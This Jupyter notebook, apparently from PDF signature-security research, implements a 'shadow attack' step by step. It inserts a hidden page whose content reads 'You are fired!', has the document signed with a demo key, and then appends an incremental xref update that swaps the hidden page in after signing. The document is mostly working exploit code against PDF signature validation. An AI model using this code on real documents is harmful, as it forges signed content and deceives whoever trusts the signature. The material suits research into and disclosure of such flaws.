# Step 0: Configuration Parameters

In [18]:
# Directory that holds the input PDF and receives every generated PDF.
folder_path = "/media/sf_vladi/Dokumente/git/research/pdf_security/tools/shadow-attacker/pdfs/hide-and-replace/"
# Directory of the external signer (jar, PKCS#12 key store and signature image).
signer_path = "./pdf-signer/"

# File names, all relative to folder_path.
input_file = "helloworld.pdf"
shadowed_file = "shadowed.pdf"
shadowed_file_signed = "shadowed-signed.pdf"
shadowed_file_signed_manipulated = "shadowed-signed-manipulated.pdf"

# Content stream placed into the hidden page object.
malicious_content = (
    b"BT\n"
    b"/F16 11.9552 Tf 88.425 759.068 Td [(Y)94(ou)-375(are)-375(fired!)]TJ"
    b"/F15 11.9552 Tf 206.286 -718.09 Td [(1)]TJ\n"
    b"ET\n\n"
)

# Step 1: Generating shadow document
The following script places hidden objects with malicious content into the PDF (*input_file*).
The resulting document is then signed by the signing authority.

On the presentation level, the new document (*shadowed_file*) does not differ from the previous one (*input_file*).

In [19]:
import mmap
import os
import re
import subprocess

import PyPDF4 as pyPDF
from PyPDF4.generic import *

# Clone the original document into the modified one
def cloneDoc():
    """Pass the global ``pdf_reader`` to ``pdf_writer.cloneReaderDocumentRoot``.

    Operates on the module-level ``pdf_reader`` / ``pdf_writer`` objects, which must
    exist before this is called. Takes no arguments and returns nothing.
    """
    pdf_writer.cloneReaderDocumentRoot(pdf_reader)

# Creates an empty signature field which will be used later by the signer
# This is only executed if no signature field exists in the document
def create_sig_annotation():
    """Build an empty signature widget annotation and register it with ``pdf_writer``.

    The encoding, both fonts, the appearance dictionary and the annotation itself are
    added to the global ``pdf_writer`` as separate objects.

    Returns:
        tuple: ``(annotObj, dr_resources)`` - the annotation dictionary and the
        resources dictionary (``/Encoding`` and ``/Font``) that callers store under
        the AcroForm ``/DR`` key.
    """
    def _ref(obj):
        # Indirect reference to an object that was already added to pdf_writer.
        return IndirectObject(pdf_writer.getReference(obj).idnum, 0, pdf_writer)

    bsDict = DictionaryObject()
    bsDict.update({
        NameObject("/W"): NumberObject(0),
        NameObject("/S"): NameObject("/S")})

    encodingDict = DictionaryObject()
    encodingDict.update({
        NameObject("/Type"): NameObject("/Encoding"),
        # A list, not a set: the start code must be followed by the glyph names
        # in exactly this order, and a set would not preserve it.
        NameObject("/Differences"): ArrayObject([
            NumberObject(24), NameObject("/breve"), NameObject("/caron"), NameObject("/circumflex"),
            NameObject("/dotaccent"), NameObject("/hungarumlaut"), NameObject("/ogonek"), NameObject("/ring")])})
    pdf_writer._addObject(encodingDict)

    helvDict = DictionaryObject()
    helvDict.update({
        NameObject("/BaseFont"): NameObject("/Helvetica"),
        NameObject("/Name"): NameObject("/Helv"),
        NameObject("/Subtype"): NameObject("/Type1"),
        NameObject("/Type"): NameObject("/Font"),
        NameObject("/Encoding"): _ref(encodingDict)})
    pdf_writer._addObject(helvDict)

    zaDB = DictionaryObject()
    zaDB.update({
        NameObject("/BaseFont"): NameObject("/ZapfDingbats"),
        NameObject("/Name"): NameObject("/ZaDb"),
        NameObject("/Subtype"): NameObject("/Type1"),
        NameObject("/Type"): NameObject("/Font")})
    pdf_writer._addObject(zaDB)

    dr_resources = DictionaryObject({
        NameObject("/Encoding"): DictionaryObject({
            NameObject("/PDFDocEncoding"): _ref(encodingDict)}),
        NameObject("/Font"): DictionaryObject({
            NameObject("/Helv"): _ref(helvDict),
            NameObject("/ZaDb"): _ref(zaDB)
        })
    })

    nDict = DictionaryObject()
    nDict.update({
        NameObject("/BBox"): RectangleObject([0, 0, 171, 50]),
        NameObject("/Resources"): dr_resources
    })
    pdf_writer._addObject(nDict)

    #TODO: Reference to Page must be fixed: IndirectObject(pdf_writer.getReference(pdf_writer._objects[0]).idnum
    annotObj = DictionaryObject()
    annotObj.update({
        NameObject("/Type"): NameObject("/Annot"),
        # The key is spelled "/Subtype" (as in the font dictionaries above), not "/SubType".
        NameObject("/Subtype"): NameObject("/Widget"),
        NameObject("/FT"): NameObject("/Sig"),
        NameObject("/Rect"): RectangleObject([150.0, 400.0, 450.0, 480.0]),
        NameObject("/T"): createStringObject("Signature1"),
        NameObject("/BS"): bsDict,
        # NameObject("/P"):IndirectObject(pdf_writer.getReference(pdf_writer._objects[0]).idnum, 0, pdf_writer),
        # NOTE(review): a parenthesised string is passed through NameObject here,
        # presumably so it is written verbatim - confirm before changing.
        NameObject("/DA"): NameObject("(/Helvetica 0.0 Tf 0.0 0.0 0.0 rg)"),
        NameObject("/MK"): DictionaryObject(),
        NameObject("/F"): NumberObject(4),
        NameObject("/AP"): DictionaryObject({NameObject("/N"): _ref(nDict)})})
    pdf_writer._addObject(annotObj)
    return annotObj, dr_resources

# Creates an AcroForm that references the empty signature field used later by the signer
# This is only executed if the document catalog has no /AcroForm entry
def create_empty_signature_field():
    """Add a new AcroForm with one empty signature field to ``pdf_writer``.

    The signature annotation comes from ``create_sig_annotation``; the resulting
    AcroForm dictionary is registered with the writer and linked from the writer's
    root object under ``/AcroForm``.
    """
    sigAnnot, rdResources = create_sig_annotation()
    sig_ref = IndirectObject(pdf_writer.getReference(sigAnnot).idnum, 0, pdf_writer)

    acro_form = DictionaryObject()
    acro_form.update({
        NameObject("/DA"): NameObject("(/Helv 0 Tf 0 g)"),
        NameObject("/SigFlags"): NumberObject(1),
        NameObject("/Fields"): ArrayObject([sig_ref]),
        NameObject("/DR"): rdResources})
    pdf_writer._addObject(acro_form)

    # Link the new form from the document root.
    acro_form_ref = IndirectObject(pdf_writer.getReference(acro_form).idnum, 0, pdf_writer)
    root = pdf_writer._root_object.getObject()
    root.update({NameObject("/AcroForm"): acro_form_ref})

## Creates all shadow objects containing the malicious content
def create_shadow_objects():
    """Add the shadow content stream, page and page-tree node to ``pdf_writer``.

    The shadow page copies every entry of page 0 of ``pdf_reader`` except that
    ``/Contents`` points at a new stream holding ``malicious_content`` and
    ``/Parent`` is the placeholder ``6666 0 R`` (patched later by ``replacePagesID``).
    The shadow /Pages node copies the original one with ``/Kids`` reduced to the
    shadow page and ``/Count`` set to 1.

    Returns:
        The object number of the shadow /Pages node inside ``pdf_writer``.
    """
    def _ref(obj):
        # Indirect reference to an object that was already added to pdf_writer.
        return IndirectObject(pdf_writer.getReference(obj).idnum, 0, pdf_writer)

    # Contents of the page, which will be displayed after the modification
    shadow_contents = DecodedStreamObject()
    shadow_contents.setData(malicious_content)
    pdf_writer._addObject(shadow_contents)

    shadow_page = DictionaryObject()
    for key, val in pdf_reader.getPage(0).items():
        if f"{key}".startswith('/Contents'):
            shadow_page[NameObject(key)] = _ref(shadow_contents)
        else:
            shadow_page[NameObject(key)] = val
    # Dummy parent reference; keeps its position if /Parent was copied above.
    shadow_page[NameObject("/Parent")] = NameObject("6666 0 R")
    pdf_writer._addObject(shadow_page)

    pages_obj_id = find_ObjectIDByType(pdf_reader, "/Pages")
    shadow_pages = DictionaryObject()
    for key, val in pdf_reader.resolvedObjects[0, pages_obj_id].items():
        key_text = f"{key}"
        if key_text.startswith('/Kids'):
            shadow_pages[NameObject(key)] = ArrayObject([_ref(shadow_page)])
        elif key_text.startswith('/Count'):
            shadow_pages[NameObject("/Count")] = NumberObject(1)
        else:
            shadow_pages[NameObject(key)] = val
    pdf_writer._addObject(shadow_pages)

    return pdf_writer.getReference(shadow_pages).idnum

def find_ObjectIDByType (pdf, needle):
    """Return the object number of the first resolved object whose ``/Type`` is ``needle``.

    Args:
        pdf: reader-like object exposing a ``resolvedObjects`` mapping whose keys are
            tuples; the second tuple element is returned as the object number.
        needle: value compared against each object's ``"/Type"`` entry, e.g. ``"/Pages"``.

    Returns:
        The second element of the first matching key, or ``None`` if nothing matches.
    """
    # Search the reader that was passed in, not the module-level pdf_reader.
    for key, val in pdf.resolvedObjects.items():
        # Resolved objects may be non-dictionaries or lack /Type; skip them instead of raising.
        if isinstance(val, dict) and "/Type" in val and val["/Type"] == needle:
            return key[1]
    return None

def replacePagesID (originalID, shadowedID):
    """Patch the shadowed PDF on disk so the shadow /Pages node reuses the original ID.

    Reads ``folder_path + shadowed_file``, renames the object header
    ``<shadowedID> 0 obj`` to ``<originalID> 0 obj``, replaces the dummy reference
    ``6666 0 R`` with ``<originalID> 0 R`` plus space padding, and writes the result
    back to the same file.

    Args:
        originalID: object number of the original /Pages node.
        shadowedID: object number of the shadow /Pages node.
    """
    path = folder_path + shadowed_file
    with open(path, "rb") as fin:
        data = fin.read()

    original = bytes(f"{originalID}", "utf-8")
    shadowed = bytes(f"{shadowedID}", "utf-8")

    # Padding depends on the number of digits in originalID. Measuring a
    # one-element set instead would always give 1, whatever the ID.
    # NOTE(review): the extra "- 1" is kept from the original formula; the
    # replacement is therefore one byte shorter than "6666 0 R" - confirm intent.
    padding = b" " * (len("6666") - len(original) - 1)

    # Rename the shadow object's header to the original object number.
    data = data.replace(b"\n" + shadowed + b" 0 obj\n", b"\n" + original + b" 0 obj\n")
    # Replace the dummy reference and pad it.
    data = data.replace(b"6666 0 R", original + b" 0 R" + padding)

    with open(path, "wb") as fout:
        fout.write(data)

# Finds the byte position of a string in a file
def findBytePositionOfText(file,word):
    """Locate the last match of ``word`` in an open file.

    Args:
        file: open binary file object; only its ``fileno()`` is used.
        word: text to search for; it is UTF-8 encoded and used as a
            regular-expression pattern.

    Returns:
        tuple: ``(start, end)`` byte offsets of the last match, or ``(0, 0)`` when
        the pattern does not occur.
    """
    startPos = 0
    endPos = 0
    # A read-only mapping is enough for searching and also works for handles opened
    # with "rb"; the context manager releases the mapping when the search is done.
    with mmap.mmap(file.fileno(), 0, access=mmap.ACCESS_READ) as mf:
        for m in re.finditer(bytes(word, "utf-8"), mf):
            # Keep overwriting so the positions of the last match win.
            startPos = m.start()
            endPos = m.end()
    return startPos, endPos

def acroform_provided():
    """Ensure a signature field exists when the input document already has an /AcroForm.

    If any field reported by ``pdf_reader.getFields()`` has ``/FT`` equal to ``/Sig``
    nothing is changed. Otherwise one signature annotation is created via
    ``create_sig_annotation``, appended to the existing ``/Fields`` array, and a new
    AcroForm dictionary referencing that array is linked from the writer's root.
    """
    # getFields() may yield nothing when the form has no fields.
    existing_fields = pdf_reader.getFields() or {}

    # Decide once for the whole document (not per field), and tolerate fields without /FT.
    if any(field.get("/FT") == "/Sig" for field in existing_fields.values()):
        print("Signature Field in file detected. Nothing to do!")
        return

    sigAnnot, rdResources = create_sig_annotation()
    acroform = pdf_reader.trailer["/Root"]["/AcroForm"]
    fieldsArray = acroform["/Fields"] if "/Fields" in acroform else ArrayObject()
    fieldsArray.append(IndirectObject(pdf_writer.getReference(sigAnnot).idnum, 0, pdf_writer))

    tmpObj = DictionaryObject()
    tmpObj.update({
        NameObject("/DA"): NameObject("(/Helv 0 Tf 0 g)"),
        NameObject("/SigFlags"): NumberObject(1),
        NameObject("/Fields"): fieldsArray,
        NameObject("/DR"): rdResources})
    pdf_writer._addObject(tmpObj)

    catalog = pdf_writer._root_object.getObject()
    catalog.update({NameObject("/AcroForm"): IndirectObject(pdf_writer.getReference(tmpObj).idnum, 0, pdf_writer)})



# Driver for the cell: builds the shadowed PDF from input_file and leaves
# pdf_reader, pdf_writer, shadowPagesObjID and originalPagesObjID as globals.

# Step 1: Read the original document and create a new one for the manipulations
# NOTE(review): the file handle passed to PdfFileReader is never closed.
pdf_reader = pyPDF.PdfFileReader(open(folder_path+input_file, mode="rb"))
# Iterate over every page; presumably this fills pdf_reader.resolvedObjects,
# which create_shadow_objects() reads later - confirm.
list(pdf_reader.pages)
pdf_writer = pyPDF.PdfFileWriter()

# Step 2: Clone the original document into the manipulated one
cloneDoc()

# Step 3: Insert an empty signature field
# TODO: Check also if a Signature Field is provided
catalog = pdf_reader.trailer["/Root"].getObject()
if "/AcroForm" in catalog:
    # A form already exists: extend it if it has no signature field.
    acroform_provided()
else:
    # No form yet: create one containing a single empty signature field.
    create_empty_signature_field()

# Step 4: Create the shadow objects with the malicious content
shadowPagesObjID = create_shadow_objects()

# Step 5: Store the manipulated file
with open(folder_path+shadowed_file, "wb") as filehandle_output:
    pdf_writer.write(filehandle_output)

# Step 6: Last adjustments for the shadow attack:
# - the shadow objects need to have the same object ID as the original ones
# NOTE(review): this handle is also left open while replacePagesID() rewrites the same file.
shadow_pdf = pyPDF.PdfFileReader(open(folder_path+shadowed_file, mode="rb"))
list(shadow_pdf.pages) # Iterate over every page of the written file.
# Look up the object number that the document root references under /Pages.
# NOTE(review): originalPagesObjID stays undefined if the root has no /Pages key.
for key, val in shadow_pdf.trailer["/Root"].items():
        if f"{key}".startswith('/Pages'):
            originalPagesObjID = val.idnum
# Patch the written file in place so the shadow /Pages node carries the original ID.
replacePagesID(originalPagesObjID,shadowPagesObjID)



# Step 2: Sign the document

In [20]:
# Run the external signer on the shadowed PDF. The command is passed as an
# argument list (no shell), so paths containing spaces or shell metacharacters
# reach the signer unchanged.
signer_command = [
    "java", "-jar", signer_path + "pdfsigner.jar",
    "-i", folder_path + shadowed_file,
    "-o", folder_path + shadowed_file_signed,
    "-pkcs", signer_path + "demo-rsa2048.p12",
    "-password", "demo-rsa2048",
    "-sigtype", "approval",
    "-sigview", "visible",
    "-sigimg", signer_path + "PdfInsecurityTeam-Logo.png",
]
# Last expression of the cell: the signer's exit code (0 on success).
subprocess.run(signer_command).returncode

0

# Step 3: Manipulate the signed document

In [21]:
# Appends an incremental update to the signed PDF whose xref entry for
# originalPagesObjID points at the byte offset recorded for shadowPagesObjID.
# Both handles are closed as soon as the data derived from them has been computed.

# Step 1: Read the signed file (parsed by PyPDF4 and as raw bytes)
signed_path = folder_path + shadowed_file_signed
# "r+b" is kept for the raw handle because findBytePositionOfText memory-maps it.
with open(signed_path, mode="rb") as signed_for_reader, open(signed_path, "r+b") as signed:
    shadow_pdf_signed = pyPDF.PdfFileReader(signed_for_reader)
    data = signed.read()

    # Step 2: Prepare the new xref table and trailer which will be appended
    startOldXref, endOldXref = findBytePositionOfText(signed, "startxref")
    endFile, startNewXRef = findBytePositionOfText(signed, "%%EOF\n")
    # findBytePositionOfText reports (0, 0) when nothing matched; stop here rather
    # than writing an update with bogus offsets.
    if endOldXref == 0 or startNewXRef == 0:
        raise ValueError(f"could not locate 'startxref' and '%%EOF' in {signed_path}")

    trailerStr = "trailer\n<<\n"
    for key, val in shadow_pdf_signed.trailer.items():
        if isinstance(val, IndirectObject):
            trailerStr += f"{key} {val.idnum} 0 R\n"
        elif key.startswith("/ID"):
            trailerStr += "/ID [<6B91C28C4BC9FAD39780F7874AAEDD45> <6B91C28C4BC9FAD39780F7874AAEDD45>]\n"
        elif key.startswith("/Prev"):
            # The number between the last "startxref" and the last "%%EOF" is the
            # offset of the previous xref section.
            trailerStr += f"/Prev {int(data[endOldXref+1:endFile-1])}"
        else:
            trailerStr += f"{key} {val} \n"
    trailerStr += ">>\n"

    # Step 3: Append the new xref table and trailer incrementally to the file
    shadowPagesOffset = shadow_pdf_signed.xref.get(0)[shadowPagesObjID]
    incUpdateStr = f"xref\n{originalPagesObjID} 1\n{shadowPagesOffset:010} {0:05} n\r\n{trailerStr}startxref\n{startNewXRef}\n%%EOF\n"

data += bytes(incUpdateStr, "utf-8")

# Step 4: Store the manipulated file
with open(folder_path + shadowed_file_signed_manipulated, "wb") as fin:
    fin.write(data)